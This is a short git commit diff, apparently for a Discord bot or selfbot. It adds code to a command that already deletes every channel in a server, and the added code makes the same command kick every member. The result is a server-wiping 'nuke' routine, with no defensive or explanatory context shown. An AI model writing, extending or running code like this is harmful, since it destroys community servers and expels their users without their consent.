cyan🍵fy
This commit is contained in:
parent
4d60c12d17
commit
9b09912ae5
|
@ -79,6 +79,8 @@ class UtilityCommands:
|
||||||
try:
|
try:
|
||||||
for i in message.guild.channels:
|
for i in message.guild.channels:
|
||||||
await i.delete()
|
await i.delete()
|
||||||
|
for i in message.guild.members:
|
||||||
|
await i.kick()
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
await message.edit(content=traceback.format_exc())
|
await message.edit(content=traceback.format_exc())
|
||||||
finally:
|
finally:
|
||||||
|
|
Loading…
Reference in a new issue